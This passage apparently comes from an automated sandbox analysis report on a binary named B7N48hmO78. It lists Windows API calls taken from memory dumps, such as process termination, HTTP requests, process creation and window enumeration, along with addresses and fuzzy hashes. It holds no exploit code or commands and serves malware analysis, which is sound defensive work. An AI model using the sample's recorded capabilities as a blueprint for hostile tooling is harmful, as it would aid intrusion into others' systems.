  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E07F78
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E07F8B
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E07F9E
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E07FB1
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E07FC4
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E07FD7
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E07FEA
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E07FFD
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E08010
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E08023
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E08036
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E08049
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E0805C
  • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E0806F
• __mtinitlocks.LIBCMT ref: 00E07B4C
  • Part of subcall function 00E07E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00E9AC68,00000FA0,?,?,00E07B51,00E05E77,00E96C70,00000014), ref: 00E07E41
• __mtterm.LIBCMT ref: 00E07B55
  • Part of subcall function 00E07BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00E07D3F
  • Part of subcall function 00E07BBD: _free.LIBCMT ref: 00E07D46
  • Part of subcall function 00E07BBD: RtlDeleteCriticalSection.NTDLL(00E9AC68), ref: 00E07D68
• __calloc_crt.LIBCMT ref: 00E07B7A
• GetCurrentThreadId.KERNEL32 ref: 00E07BA3
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
• String ID:
• API String ID: 2942034483-0
• Opcode ID: 40acabd5ab83ae084aa62590afe3752ed1c11624764f8981f54e708081438419
• Instruction ID: d8e830454112b81ec28eb2827aa49f66d8b9d087e27e5664078ad31a4a30f516
• Opcode Fuzzy Hash: 40acabd5ab83ae084aa62590afe3752ed1c11624764f8981f54e708081438419
• Instruction Fuzzy Hash: 84F06232E1D3521DE6287635BC0664A3AD59F01734B2426AAF8E0F50D2EB60B8C249A0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DE281D
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00DE2825
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DE2830
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DE283B
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00DE2843
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE284B
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Similarity
• API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 1423608774-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E27C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E27C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 00E27C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E27C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E27C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E27C4C
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00E29A33
• RtlEnterCriticalSection.NTDLL(?), ref: 00E29A44
• TerminateThread.KERNEL32(?,000001F6,?,?,?,00E55DEE,?,?,?,?,?,00DEED63), ref: 00E29A51
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00E55DEE,?,?,?,?,?,00DEED63), ref: 00E29A5E
  • Part of subcall function 00E293D1: CloseHandle.KERNEL32(?,?,00E29A6B,?,?,?,00E55DEE,?,?,?,?,?,00DEED63), ref: 00E293DB
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00E29A71
• RtlLeaveCriticalSection.NTDLL(?), ref: 00E29A78
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
  • Part of subcall function 00DFF4EA: std::exception::exception.LIBCMT ref: 00DFF51E
  • Part of subcall function 00DFF4EA: __CxxThrowException@8.LIBCMT ref: 00DFF533
• __swprintf.LIBCMT ref: 00DE1EA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00DE1D49
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Similarity
• API ID: Exception@8Throw__swprintfstd::exception::exception
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 2125237772-557222456
APIs
• VariantInit.OLEAUT32(?), ref: 00E3B006
• CharUpperBuffW.USER32(?,?), ref: 00E3B115
• VariantClear.OLEAUT32(?), ref: 00E3B298
  • Part of subcall function 00E29DC5: VariantInit.OLEAUT32(00000000), ref: 00E29E05
  • Part of subcall function 00E29DC5: VariantCopy.OLEAUT32(?,?), ref: 00E29E0E
  • Part of subcall function 00E29DC5: VariantClear.OLEAUT32(?), ref: 00E29E1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
APIs
  • Part of subcall function 00DFC6F4: _wcscpy.LIBCMT ref: 00DFC717
• _memset.LIBCMT ref: 00E25438
• GetMenuItemInfoW.USER32(?), ref: 00E25467
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E25513
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E2553D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 4152858687-4108050209
                                                                                                                  • Opcode ID: b6e3df82363950113de3317c8520ce269b9957246f706313f3105ad6218d1730
                                                                                                                  • Instruction ID: ae63452a58884059ba0d084e15cb9b54173b3d578a9f469a8b634cf182eb3f04
                                                                                                                  • Opcode Fuzzy Hash: b6e3df82363950113de3317c8520ce269b9957246f706313f3105ad6218d1730
                                                                                                                  • Instruction Fuzzy Hash: 845106325047219BD314EF28EA416BBB7E4EF45358F142529F896F3190DBB0DD448762
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00E2027B
                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E202B1
                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E202C2
                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E20344
                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: f67dab01f579b54d96b92d1f8f4ac094fd2337da1fbb1ca191eb06f39f34c48f
• Instruction ID: 6556db386bf94ae6abb6f29300e1f41ef206e69ff5a31dfe4666441e811c8ed5
• Opcode Fuzzy Hash: f67dab01f579b54d96b92d1f8f4ac094fd2337da1fbb1ca191eb06f39f34c48f
• Instruction Fuzzy Hash: 64415D71A04214EFDB05CF54E8C5B9A7BB9EF88314B1490A9E909EF286D7F1D944CBA0
APIs
• _memset.LIBCMT ref: 00E25075
• GetMenuItemInfoW.USER32 ref: 00E25091
• DeleteMenu.USER32(00000004,00000007,00000000), ref: 00E250D7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EA1708,00000000), ref: 00E25120
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: cc87ea78e37c95d017058c86e19c87cd1cd356b94d1170ed203cf5eec7c2b3cc
• Instruction ID: 0f502ab46ed7e9714e007539d1061ce055bb8cdb12db891eb25596da85ba6bc8
• Opcode Fuzzy Hash: cc87ea78e37c95d017058c86e19c87cd1cd356b94d1170ed203cf5eec7c2b3cc
• Instruction Fuzzy Hash: 3441CF72205B119FD720DF28ED81B6BB7E4AF85328F045A1EF855A7291D770E814CB62
APIs
• CharLowerBuffW.USER32(?,?,?,?), ref: 00E40587
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 2358735015-567219261
• Opcode ID: 94835024065f9be5f10883c5bb7f10dc479d1d2f7774d9c8266fe3134e74fbe5
• Instruction ID: f6cf420310ba3595cffa8e879880f6b798cbc03838bf5f9215a8d4c4b0d05abf
• Opcode Fuzzy Hash: 94835024065f9be5f10883c5bb7f10dc479d1d2f7774d9c8266fe3134e74fbe5
• Instruction Fuzzy Hash: AA31AF7060021AAFCF00EF68DC419EEB3B4FF54314B009669E926B76D1DB71E916CBA0
APIs
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E1B88E
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E1B8A1
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00E1B8D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: c90a432f0a668c227121ef86f19a6d3e95941a23b6fe65edf1245b2f6af8fe38
• Instruction ID: 3ff4a55f6615053aefdcff1c733c6c67c16f43a80e3333b45cc98bb4088417a6
• Opcode Fuzzy Hash: c90a432f0a668c227121ef86f19a6d3e95941a23b6fe65edf1245b2f6af8fe38
• Instruction Fuzzy Hash: 1521E172A00208BFDB08AB65DC869FE77BDDF05754B105129F125B61E0DBB44D4A9670
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E34401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E34427
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E34457
• InternetCloseHandle.WININET(00000000), ref: 00E3449E
  • Part of subcall function 00E35052: GetLastError.KERNEL32(?,?,00E343CC,00000000,00000000,00000001), ref: 00E35067
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 1951874230-3916222277
• Opcode ID: a8c07397917153b8515b949ce5c4df97d1fc3f77d9b5a939a98a00c8ca2758ad
• Instruction ID: 6f52c9bab049ff187f6c75046e1ddeba13f70254ae1e4bef769dd906a5279146
• Opcode Fuzzy Hash: a8c07397917153b8515b949ce5c4df97d1fc3f77d9b5a939a98a00c8ca2758ad
• Instruction Fuzzy Hash: C621B0F2604208BEE7119F55DC88EBB7AECEB48758F10902AF115B6180DA65AD059771
APIs
  • Part of subcall function 00DFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DFD1BA
  • Part of subcall function 00DFD17C: GetStockObject.GDI32(00000011), ref: 00DFD1CE
  • Part of subcall function 00DFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFD1D8
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E4915C
• LoadLibraryW.KERNEL32(?), ref: 00E49163
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E49178
• DestroyWindow.USER32(?), ref: 00E49180
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
• Opcode ID: 558447a63c0389538d3edb939cc3e5ee5fef86e15d50c3154af6cb4dfbb19802
• Instruction ID: 112b6bc4380adbcead81c0d80b417d493edcb5791bf1de6ee5f29b12db6d68c9
• Opcode Fuzzy Hash: 558447a63c0389538d3edb939cc3e5ee5fef86e15d50c3154af6cb4dfbb19802
• Instruction Fuzzy Hash: A521A171A00206BFEF208F65EC85EBB37ADEF993A8F111658F914B2291C775DC41A760
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00E29588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E295B9
• GetStdHandle.KERNEL32(0000000C), ref: 00E295CB
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E29605
Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                  • String ID: nul
                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                  • Opcode ID: f08d78c6b31c8fb9ea1bc0f9defc1c8f7122825cd09c853dbf95427bfe5b420b
                                                                                                                  • Instruction ID: 2b2c273ce0afe6295b9524a8d10512f980ccbc4ee77468646b0134cbdc06bcfa
                                                                                                                  • Opcode Fuzzy Hash: f08d78c6b31c8fb9ea1bc0f9defc1c8f7122825cd09c853dbf95427bfe5b420b
                                                                                                                  • Instruction Fuzzy Hash: 1021A170740215AFEB219F25EC04A9E77E4BF48324F206A19F8A1F72E2D770D944CB60
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00E29653
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E29683
• GetStdHandle.KERNEL32(000000F6), ref: 00E29694
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E296CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 4cf9e59c7f6da6d5f70c69c75362fd008a7f845cb51fae0298cc0d1c86ea427a
• Instruction ID: 57b9f3814b18840cb96d034f167731a8c78f3b70adf5480c0143f79516d4a6cc
• Opcode Fuzzy Hash: 4cf9e59c7f6da6d5f70c69c75362fd008a7f845cb51fae0298cc0d1c86ea427a
• Instruction Fuzzy Hash: EB21B6716002259FDB209F69AC44E9E77E8AF45734F202A18F8B1F72D2E7B0D845CB50
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00E2DB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E2DB5E
• __swprintf.LIBCMT ref: 00E2DB77
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00E7DC00), ref: 00E2DBB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: b4c058677822f34c9ebedcf7b332a8454bd79e09af951916d215183fd33a110a
• Instruction ID: deef36cc11f496161b8041b2cf8f0c95bb7baef02376796de3874e6d1b9f563b
• Opcode Fuzzy Hash: b4c058677822f34c9ebedcf7b332a8454bd79e09af951916d215183fd33a110a
• Instruction Fuzzy Hash: F6217135A00248AFCB10EB65DD85DEEB7F8EF49704B104069F509E7251DBB1EA45CB61
APIs
  • Part of subcall function 00E1C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E1C84A
  • Part of subcall function 00E1C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1C85D
  • Part of subcall function 00E1C82D: GetCurrentThreadId.KERNEL32 ref: 00E1C864
  • Part of subcall function 00E1C82D: AttachThreadInput.USER32(00000000), ref: 00E1C86B
• GetFocus.USER32 ref: 00E1CA05
  • Part of subcall function 00E1C876: GetParent.USER32(?), ref: 00E1C884
• GetClassNameW.USER32(?,?,00000100), ref: 00E1CA4E
• EnumChildWindows.USER32(?,00E1CAC4), ref: 00E1CA76
• __swprintf.LIBCMT ref: 00E1CA90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
• String ID: %s%d
• API String ID: 3187004680-1110647743
• Opcode ID: 52529dd375f14c8668e027263c4e60e216503723b03f7c71b1d02ee837982b29
• Instruction ID: 50183f01a31772f874587ba88217692a7e55ba6d761e9e562f88cde577d301a6
• Opcode Fuzzy Hash: 52529dd375f14c8668e027263c4e60e216503723b03f7c71b1d02ee837982b29
• Instruction Fuzzy Hash: CB11A2716402097BCF01BF619CC5FEE37A8AF54744F109066FA09BA082CBB09585CB71
APIs
• _memset.LIBCMT ref: 00E4E33D
• _memset.LIBCMT ref: 00E4E34C
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EA3D00,00EA3D44), ref: 00E4E37B
• CloseHandle.KERNEL32 ref: 00E4E38D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID: D=
• API String ID: 3277943733-488882995
• Opcode ID: 4504703784b4bfcb9767639d6238d2d783e04f52d3d05d3a1dcb5fc7a2ecd8d5
• Instruction ID: 534809dd700fba54545b52d5670aebbb8fca24b4ff8f2d4152a148c71cb7f1f0
• Opcode Fuzzy Hash: 4504703784b4bfcb9767639d6238d2d783e04f52d3d05d3a1dcb5fc7a2ecd8d5
• Instruction Fuzzy Hash: 91F03AB1640304BEE2101B72AC46F77BE9CDB0AB54F015421FE0AFA1A2D375AE0486B9
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E419F3
